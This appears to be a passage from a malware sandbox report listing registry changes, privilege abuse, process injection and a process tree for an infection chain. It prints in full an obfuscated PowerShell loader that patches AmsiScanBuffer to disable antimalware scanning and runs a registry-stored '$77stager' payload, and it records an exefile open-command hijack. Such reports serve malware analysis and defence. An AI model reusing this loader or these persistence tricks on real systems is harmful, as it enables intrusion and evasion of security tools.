Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.EXE
Key deleted	\REGISTRY\USER\.DEFAULT\SOFTWARE\MICROSOFT\OFFICE\16.0\COMMON\CLIENTTELEMETRY\RULESMETADATA\OFFICECLICKTORUN.EXE\ULSMONITOR	OfficeClickToRun.exe
Key deleted	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0	OfficeClickToRun.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSCategoriesSeverities = "1329 10,1329 50,1329 15,1329 100,1329 6"	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	svchost.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe_queried = "1722950749"	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.EXE
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\RulesEndpoint = "https://nexusrules.officeapps.live.com/nexus/rules?Application=officeclicktorun.exe&Version=16.0.12527.20470&ClientId={6C9ED9E4-1921-4113-9771-D1613E4CBF53}&OSEnvironment=10&MsoAppId=37&AudienceName=Production&AudienceGroup=Production&AppVersion=16.0.12527.20470&"	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.EXE
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSTagIds0 = "5804129,7202269,17110992,41484365,39965824,7153487,17110988,508368333,17962391,17962392,3462423,3702920,3700754,3965062,4297094,7153421,18716193,7153435,7202265,20502174,6308191,18407617"	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.EXE
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe = "Tue, 06 Aug 2024 13:25:49 GMT"	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common	OfficeClickToRun.exe

Modifies registry class 19 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2842058299-443432012-2465494467-1000_Classes\Local Settings	powershell.exe
Key created	\REGISTRY\USER\S-1-5-21-2842058299-443432012-2465494467-1000_Classes\Local Settings	$77SVC~1.EXE
Key created	\REGISTRY\USER\S-1-5-21-2842058299-443432012-2465494467-1000_Classes\Local Settings	powershell.exe
Key created	\REGISTRY\USER\S-1-5-21-2842058299-443432012-2465494467-1000_Classes\Local Settings	dqplkd.exe
Key created	\REGISTRY\USER\S-1-5-21-2842058299-443432012-2465494467-1000_Classes\Local Settings	powershell.exe
Key created	\REGISTRY\USER\S-1-5-21-2842058299-443432012-2465494467-1000_Classes\Local Settings	iyrven.exe
Key created	\REGISTRY\USER\S-1-5-21-2842058299-443432012-2465494467-1000_Classes\Local Settings	powershell.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	xuolte.exe
Key created	\REGISTRY\USER\S-1-5-21-2842058299-443432012-2465494467-1000_Classes\Local Settings	InstallUtil.exe
Key created	\REGISTRY\USER\S-1-5-21-2842058299-443432012-2465494467-1000_Classes\Local Settings	powershell.exe
Key created	\REGISTRY\USER\S-1-5-21-2842058299-443432012-2465494467-1000_Classes\Local Settings	WinUpdate.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\open\command\ = "C:\\Windows\\svchost.com \"%1\" %*"	xuolte.exe
Key created	\REGISTRY\USER\S-1-5-21-2842058299-443432012-2465494467-1000_Classes\Local Settings	powershell.exe
Key created	\REGISTRY\USER\S-1-5-21-2842058299-443432012-2465494467-1000_Classes\Local Settings	powershell.exe
Key created	\REGISTRY\USER\S-1-5-21-2842058299-443432012-2465494467-1000_Classes\Local Settings	powershell.exe
Key created	\REGISTRY\USER\S-1-5-21-2842058299-443432012-2465494467-1000_Classes\Local Settings	xuolte.exe
Key created	\REGISTRY\USER\S-1-5-21-2842058299-443432012-2465494467-1000_Classes\Local Settings	InstallUtil.exe
Key created	\REGISTRY\USER\S-1-5-21-2842058299-443432012-2465494467-1000_Classes\Local Settings	WINUPD~1.EXE
Key created	\REGISTRY\USER\S-1-5-21-2842058299-443432012-2465494467-1000_Classes\Local Settings	powershell.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
1064	schtasks.exe
428	schtasks.exe
1364	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
2064	cb8c4074612cd630a1907bf5aeb4c2ec70bd8ecff6dac5ef1f4704a36abc38c7.exe
2036	adns.exe
656	powershell.exe
656	powershell.exe
868	InstallUtil.exe
232	powershell.EXE
232	powershell.EXE
4196	$77SVC~1.EXE
4196	$77SVC~1.EXE
4196	$77SVC~1.EXE
4196	$77SVC~1.EXE
4196	$77SVC~1.EXE
4196	$77SVC~1.EXE
4196	$77SVC~1.EXE
4196	$77SVC~1.EXE
4196	$77SVC~1.EXE
4196	$77SVC~1.EXE
4196	$77SVC~1.EXE
4196	$77SVC~1.EXE
4196	$77SVC~1.EXE
4196	$77SVC~1.EXE
4196	$77SVC~1.EXE
4196	$77SVC~1.EXE
4196	$77SVC~1.EXE
4196	$77SVC~1.EXE
4196	$77SVC~1.EXE
4104	powershell.exe
4104	powershell.exe
868	InstallUtil.exe
4304	powershell.exe
4304	powershell.exe
3040	InstallUtil.exe
1616	dqplkd.exe
1616	dqplkd.exe
1616	dqplkd.exe
1616	dqplkd.exe
1616	dqplkd.exe
1616	dqplkd.exe
1616	dqplkd.exe
1616	dqplkd.exe
1616	dqplkd.exe
1616	dqplkd.exe
1616	dqplkd.exe
1616	dqplkd.exe
1616	dqplkd.exe
1616	dqplkd.exe
1616	dqplkd.exe
1616	dqplkd.exe
1616	dqplkd.exe
1616	dqplkd.exe
1616	dqplkd.exe
2076	WINUPD~1.EXE
2076	WINUPD~1.EXE
2076	WINUPD~1.EXE
2076	WINUPD~1.EXE
2076	WINUPD~1.EXE
2076	WINUPD~1.EXE
2076	WINUPD~1.EXE
2076	WINUPD~1.EXE
2076	WINUPD~1.EXE
2076	WINUPD~1.EXE
2076	WINUPD~1.EXE
2076	WINUPD~1.EXE
2076	WINUPD~1.EXE

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
3292	Explorer.EXE

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	2064	cb8c4074612cd630a1907bf5aeb4c2ec70bd8ecff6dac5ef1f4704a36abc38c7.exe
Token: SeDebugPrivilege	2064	cb8c4074612cd630a1907bf5aeb4c2ec70bd8ecff6dac5ef1f4704a36abc38c7.exe
Token: SeDebugPrivilege	2036	adns.exe
Token: SeDebugPrivilege	868	InstallUtil.exe
Token: SeDebugPrivilege	2036	adns.exe
Token: SeDebugPrivilege	656	powershell.exe
Token: SeDebugPrivilege	232	powershell.EXE
Token: SeDebugPrivilege	3040	InstallUtil.exe
Token: SeDebugPrivilege	4196	$77SVC~1.EXE
Token: SeDebugPrivilege	4104	powershell.exe
Token: SeDebugPrivilege	1616	dqplkd.exe
Token: SeDebugPrivilege	4304	powershell.exe
Token: SeDebugPrivilege	2036	iyrven.exe
Token: SeDebugPrivilege	2076	WINUPD~1.EXE
Token: SeDebugPrivilege	3912	$77pop2.exe
Token: SeDebugPrivilege	232	powershell.EXE
Token: SeDebugPrivilege	1788	dllhost.exe
Token: SeDebugPrivilege	1244	powershell.exe
Token: SeShutdownPrivilege	3292	Explorer.EXE
Token: SeCreatePagefilePrivilege	3292	Explorer.EXE
Token: SeShutdownPrivilege	3292	Explorer.EXE
Token: SeCreatePagefilePrivilege	3292	Explorer.EXE
Token: SeShutdownPrivilege	3292	Explorer.EXE
Token: SeCreatePagefilePrivilege	3292	Explorer.EXE
Token: SeShutdownPrivilege	3292	Explorer.EXE
Token: SeCreatePagefilePrivilege	3292	Explorer.EXE
Token: SeShutdownPrivilege	3292	Explorer.EXE
Token: SeCreatePagefilePrivilege	3292	Explorer.EXE
Token: SeDebugPrivilege	3640	omiliz.exe
Token: SeDebugPrivilege	2008	WinUpdate.exe
Token: SeDebugPrivilege	2036	iyrven.exe
Token: SeShutdownPrivilege	3292	Explorer.EXE
Token: SeCreatePagefilePrivilege	3292	Explorer.EXE
Token: SeShutdownPrivilege	3292	Explorer.EXE
Token: SeCreatePagefilePrivilege	3292	Explorer.EXE
Token: SeShutdownPrivilege	3292	Explorer.EXE
Token: SeCreatePagefilePrivilege	3292	Explorer.EXE
Token: SeShutdownPrivilege	3292	Explorer.EXE
Token: SeCreatePagefilePrivilege	3292	Explorer.EXE
Token: SeAssignPrimaryTokenPrivilege	2680	svchost.exe
Token: SeIncreaseQuotaPrivilege	2680	svchost.exe
Token: SeSecurityPrivilege	2680	svchost.exe
Token: SeTakeOwnershipPrivilege	2680	svchost.exe
Token: SeLoadDriverPrivilege	2680	svchost.exe
Token: SeSystemtimePrivilege	2680	svchost.exe
Token: SeBackupPrivilege	2680	svchost.exe
Token: SeRestorePrivilege	2680	svchost.exe
Token: SeShutdownPrivilege	2680	svchost.exe
Token: SeSystemEnvironmentPrivilege	2680	svchost.exe
Token: SeUndockPrivilege	2680	svchost.exe
Token: SeManageVolumePrivilege	2680	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	2680	svchost.exe
Token: SeIncreaseQuotaPrivilege	2680	svchost.exe
Token: SeSecurityPrivilege	2680	svchost.exe
Token: SeTakeOwnershipPrivilege	2680	svchost.exe
Token: SeLoadDriverPrivilege	2680	svchost.exe
Token: SeSystemtimePrivilege	2680	svchost.exe
Token: SeBackupPrivilege	2680	svchost.exe
Token: SeRestorePrivilege	2680	svchost.exe
Token: SeShutdownPrivilege	2680	svchost.exe
Token: SeSystemEnvironmentPrivilege	2680	svchost.exe
Token: SeUndockPrivilege	2680	svchost.exe
Token: SeManageVolumePrivilege	2680	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	2680	svchost.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
3912	$77pop2.exe

Suspicious use of UnmapMainImage 2 IoCs

pid	Process
3292	Explorer.EXE
4012	RuntimeBroker.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2064 wrote to memory of 3716	2064	cb8c4074612cd630a1907bf5aeb4c2ec70bd8ecff6dac5ef1f4704a36abc38c7.exe	84
PID 2064 wrote to memory of 3716	2064	cb8c4074612cd630a1907bf5aeb4c2ec70bd8ecff6dac5ef1f4704a36abc38c7.exe	84
PID 2064 wrote to memory of 3716	2064	cb8c4074612cd630a1907bf5aeb4c2ec70bd8ecff6dac5ef1f4704a36abc38c7.exe	84
PID 3716 wrote to memory of 2372	3716	cmd.exe	86
PID 3716 wrote to memory of 2372	3716	cmd.exe	86
PID 3716 wrote to memory of 2372	3716	cmd.exe	86
PID 2064 wrote to memory of 2036	2064	cb8c4074612cd630a1907bf5aeb4c2ec70bd8ecff6dac5ef1f4704a36abc38c7.exe	87
PID 2064 wrote to memory of 2036	2064	cb8c4074612cd630a1907bf5aeb4c2ec70bd8ecff6dac5ef1f4704a36abc38c7.exe	87
PID 2064 wrote to memory of 2036	2064	cb8c4074612cd630a1907bf5aeb4c2ec70bd8ecff6dac5ef1f4704a36abc38c7.exe	87
PID 2064 wrote to memory of 868	2064	cb8c4074612cd630a1907bf5aeb4c2ec70bd8ecff6dac5ef1f4704a36abc38c7.exe	88
PID 2064 wrote to memory of 868	2064	cb8c4074612cd630a1907bf5aeb4c2ec70bd8ecff6dac5ef1f4704a36abc38c7.exe	88
PID 2064 wrote to memory of 868	2064	cb8c4074612cd630a1907bf5aeb4c2ec70bd8ecff6dac5ef1f4704a36abc38c7.exe	88
PID 2064 wrote to memory of 868	2064	cb8c4074612cd630a1907bf5aeb4c2ec70bd8ecff6dac5ef1f4704a36abc38c7.exe	88
PID 2064 wrote to memory of 868	2064	cb8c4074612cd630a1907bf5aeb4c2ec70bd8ecff6dac5ef1f4704a36abc38c7.exe	88
PID 2064 wrote to memory of 868	2064	cb8c4074612cd630a1907bf5aeb4c2ec70bd8ecff6dac5ef1f4704a36abc38c7.exe	88
PID 2064 wrote to memory of 868	2064	cb8c4074612cd630a1907bf5aeb4c2ec70bd8ecff6dac5ef1f4704a36abc38c7.exe	88
PID 2064 wrote to memory of 868	2064	cb8c4074612cd630a1907bf5aeb4c2ec70bd8ecff6dac5ef1f4704a36abc38c7.exe	88
PID 2064 wrote to memory of 1364	2064	cb8c4074612cd630a1907bf5aeb4c2ec70bd8ecff6dac5ef1f4704a36abc38c7.exe	89
PID 2064 wrote to memory of 1364	2064	cb8c4074612cd630a1907bf5aeb4c2ec70bd8ecff6dac5ef1f4704a36abc38c7.exe	89
PID 2064 wrote to memory of 1364	2064	cb8c4074612cd630a1907bf5aeb4c2ec70bd8ecff6dac5ef1f4704a36abc38c7.exe	89
PID 1364 wrote to memory of 3820	1364	cmd.exe	91
PID 1364 wrote to memory of 3820	1364	cmd.exe	91
PID 1364 wrote to memory of 3820	1364	cmd.exe	91
PID 2036 wrote to memory of 2904	2036	adns.exe	92
PID 2036 wrote to memory of 2904	2036	adns.exe	92
PID 2036 wrote to memory of 2904	2036	adns.exe	92
PID 2904 wrote to memory of 2428	2904	cmd.exe	94
PID 2904 wrote to memory of 2428	2904	cmd.exe	94
PID 2904 wrote to memory of 2428	2904	cmd.exe	94
PID 2036 wrote to memory of 3040	2036	adns.exe	95
PID 2036 wrote to memory of 3040	2036	adns.exe	95
PID 2036 wrote to memory of 3040	2036	adns.exe	95
PID 2036 wrote to memory of 3040	2036	adns.exe	95
PID 2036 wrote to memory of 3040	2036	adns.exe	95
PID 2036 wrote to memory of 3040	2036	adns.exe	95
PID 2036 wrote to memory of 3040	2036	adns.exe	95
PID 2036 wrote to memory of 3040	2036	adns.exe	95
PID 2036 wrote to memory of 3452	2036	adns.exe	96
PID 2036 wrote to memory of 3452	2036	adns.exe	96
PID 2036 wrote to memory of 3452	2036	adns.exe	96
PID 3452 wrote to memory of 3616	3452	cmd.exe	98
PID 3452 wrote to memory of 3616	3452	cmd.exe	98
PID 3452 wrote to memory of 3616	3452	cmd.exe	98
PID 868 wrote to memory of 1512	868	InstallUtil.exe	99
PID 868 wrote to memory of 1512	868	InstallUtil.exe	99
PID 868 wrote to memory of 1512	868	InstallUtil.exe	99
PID 1512 wrote to memory of 656	1512	cmd.exe	101
PID 1512 wrote to memory of 656	1512	cmd.exe	101
PID 1512 wrote to memory of 656	1512	cmd.exe	101
PID 656 wrote to memory of 2736	656	powershell.exe	102
PID 656 wrote to memory of 2736	656	powershell.exe	102
PID 656 wrote to memory of 2736	656	powershell.exe	102
PID 2736 wrote to memory of 3912	2736	xuolte.exe	103
PID 2736 wrote to memory of 3912	2736	xuolte.exe	103
PID 2736 wrote to memory of 3912	2736	xuolte.exe	103
PID 3912 wrote to memory of 3568	3912	xuolte.exe	104
PID 3912 wrote to memory of 3568	3912	xuolte.exe	104
PID 3912 wrote to memory of 3568	3912	xuolte.exe	104
PID 3912 wrote to memory of 4944	3912	xuolte.exe	105
PID 3912 wrote to memory of 4944	3912	xuolte.exe	105
PID 3912 wrote to memory of 4944	3912	xuolte.exe	105
PID 4944 wrote to memory of 4196	4944	svchost.com	106
PID 4944 wrote to memory of 4196	4944	svchost.com	106
PID 4944 wrote to memory of 4196	4944	svchost.com	106

C:\Windows\system32\winlogon.exe
winlogon.exe
1⤵
PID:644
- C:\Windows\system32\dwm.exe
  "dwm.exe"
  2⤵
  PID:432
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{73482998-da46-4f92-9a98-28391a3a1c01}
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:1788

C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
1⤵
PID:704

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
1⤵
PID:1000

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
1⤵
PID:716

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
1⤵
PID:744

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
1⤵
PID:1044

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
1⤵
PID:1108

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
1⤵
PID:1144

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
1⤵
PID:1168
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:jUKHroeCjtqW{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$tIDEmUfASrdZan,[Parameter(Position=1)][Type]$AIhDSSvJES)$SMayFLueuJm=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+[Char](101)+''+'f'+''+'l'+''+'e'+''+[Char](99)+''+[Char](116)+''+[Char](101)+''+[Char](100)+'De'+[Char](108)+''+[Char](101)+'g'+'a'+'t'+'e'+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('In'+[Char](77)+''+'e'+''+[Char](109)+''+[Char](111)+''+[Char](114)+'y'+'M'+''+[Char](111)+'d'+[Char](117)+''+'l'+'e',$False).DefineType(''+[Char](77)+''+[Char](121)+''+[Char](68)+''+[Char](101)+'le'+[Char](103)+''+[Char](97)+''+'t'+'e'+[Char](84)+''+'y'+''+'p'+''+'e'+'',''+'C'+''+[Char](108)+'a'+[Char](115)+''+[Char](115)+''+','+''+[Char](80)+'ubli'+'c'+''+[Char](44)+''+'S'+''+[Char](101)+''+[Char](97)+'le'+[Char](100)+''+[Char](44)+'A'+[Char](110)+''+[Char](115)+''+[Char](105)+'Cl'+'a'+''+'s'+''+[Char](115)+''+','+''+[Char](65)+''+'u'+''+'t'+''+[Char](111)+''+[Char](67)+''+[Char](108)+'a'+'s'+'s',[MulticastDelegate]);$SMayFLueuJm.DefineConstructor(''+'R'+''+'T'+'S'+'p'+''+[Char](101)+'c'+[Char](105)+'a'+'l'+''+[Char](78)+''+[Char](97)+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+'H'+'id'+'e'+''+[Char](66)+''+'y'+''+[Char](83)+'ig'+','+''+[Char](80)+''+[Char](117)+''+'b'+''+'l'+'i'+'c'+'',[Reflection.CallingConventions]::Standard,$tIDEmUfASrdZan).SetImplementationFlags('R'+[Char](117)+''+'n'+'t'+[Char](105)+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+[Char](77)+''+[Char](97)+''+'n'+''+[Char](97)+''+'g'+''+'e'+''+[Char](100)+'');$SMayFLueuJm.DefineMethod('I'+[Char](110)+''+'v'+'o'+[Char](107)+''+'e'+'',''+[Char](80)+'u'+[Char](98)+'l'+'i'+''+'c'+''+[Char](44)+''+[Char](72)+'ide'+'B'+''+[Char](121)+''+[Char](83)+''+[Char](105)+''+[Char](103)+''+','+''+'N'+''+[Char](101)+''+[Char](119)+''+'S'+''+[Char](108)+''+[Char](111)+''+[Char](116)+','+[Char](86)+''+'i'+''+[Char](114)+''+[Char](116)+''+[Char](117)+''+'a'+'l',$AIhDSSvJES,$tIDEmUfASrdZan).SetImplementationFlags(''+[Char](82)+''+[Char](117)+'n'+'t'+'i'+[Char](109)+''+[Char](101)+''+[Char](44)+'Ma'+[Char](110)+''+[Char](97)+'ged');Write-Output $SMayFLueuJm.CreateType();}$KEuBLDRveXTIS=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+'y'+[Char](115)+''+'t'+'e'+[Char](109)+'.'+[Char](100)+''+'l'+''+'l'+'')}).GetType(''+[Char](77)+''+[Char](105)+''+[Char](99)+''+'r'+''+[Char](111)+'soft'+[Char](46)+''+[Char](87)+''+'i'+''+'n'+''+[Char](51)+''+'2'+''+[Char](46)+'U'+[Char](110)+'s'+[Char](97)+''+'f'+''+[Char](101)+''+[Char](78)+''+[Char](97)+''+'t'+'i'+[Char](118)+''+[Char](101)+'Me'+'t'+''+'h'+'o'+'d'+''+[Char](115)+'');$FLwthMMEoZPbvF=$KEuBLDRveXTIS.GetMethod(''+[Char](71)+''+'e'+''+[Char](116)+''+'P'+'r'+[Char](111)+''+[Char](99)+'A'+[Char](100)+''+[Char](100)+''+[Char](114)+''+'e'+'ss',[Reflection.BindingFlags](''+'P'+'u'+[Char](98)+''+[Char](108)+''+[Char](105)+''+[Char](99)+''+','+''+[Char](83)+''+'t'+''+[Char](97)+''+'t'+''+[Char](105)+''+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$CYnrrSejaVSdLnsFXyl=jUKHroeCjtqW @([String])([IntPtr]);$NvFwqzJuhiZMbHtREvZaMR=jUKHroeCjtqW @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$HUmQNegdGHG=$KEuBLDRveXTIS.GetMethod(''+'G'+''+[Char](101)+''+'t'+''+'M'+''+[Char](111)+''+[Char](100)+'u'+[Char](108)+''+[Char](101)+''+'H'+''+[Char](97)+''+[Char](110)+'dle').Invoke($Null,@([Object](''+'k'+''+[Char](101)+''+'r'+'n'+'e'+''+[Char](108)+''+'3'+'2.d'+'l'+'l')));$JtbTeStQDRaNiJ=$FLwthMMEoZPbvF.Invoke($Null,@([Object]$HUmQNegdGHG,[Object](''+'L'+'o'+[Char](97)+''+'d'+''+[Char](76)+''+[Char](105)+''+[Char](98)+''+'r'+''+[Char](97)+''+'r'+''+'y'+''+[Char](65)+'')));$hGySKKIVbGxUDRwWU=$FLwthMMEoZPbvF.Invoke($Null,@([Object]$HUmQNegdGHG,[Object]('V'+'i'+''+[Char](114)+''+[Char](116)+''+[Char](117)+''+[Char](97)+''+[Char](108)+''+[Char](80)+''+'r'+'o'+[Char](116)+''+[Char](101)+''+[Char](99)+''+[Char](116)+'')));$aNokxcj=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($JtbTeStQDRaNiJ,$CYnrrSejaVSdLnsFXyl).Invoke(''+[Char](97)+''+[Char](109)+''+'s'+'i'+[Char](46)+''+'d'+''+'l'+''+'l'+'');$cFPkoPYNFBtWuZExZ=$FLwthMMEoZPbvF.Invoke($Null,@([Object]$aNokxcj,[Object]('Am'+[Char](115)+''+[Char](105)+''+'S'+''+[Char](99)+''+'a'+''+'n'+'Bu'+[Char](102)+'f'+[Char](101)+'r')));$RQhvzQOSvV=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($hGySKKIVbGxUDRwWU,$NvFwqzJuhiZMbHtREvZaMR).Invoke($cFPkoPYNFBtWuZExZ,[uint32]8,4,[ref]$RQhvzQOSvV);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$cFPkoPYNFBtWuZExZ,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($hGySKKIVbGxUDRwWU,$NvFwqzJuhiZMbHtREvZaMR).Invoke($cFPkoPYNFBtWuZExZ,[uint32]8,0x20,[ref]$RQhvzQOSvV);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+'S'+''+[Char](79)+''+[Char](70)+''+[Char](84)+''+'W'+''+[Char](65)+''+[Char](82)+''+[Char](69)+'').GetValue(''+'$'+''+'7'+''+'7'+''+[Char](115)+''+[Char](116)+''+[Char](97)+''+[Char](103)+'er')).EntryPoint.Invoke($Null,$Null)"
  2⤵
  - Suspicious use of NtCreateUserProcessOtherParentProcess
  - Command and Scripting Interpreter: PowerShell
  - Drops file in System32 directory
  - Suspicious use of SetThreadContext
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:232

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netprofm -p -s netprofm
1⤵
PID:1252

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
1⤵
PID:1348

C:\Windows\system32\svchost.exe
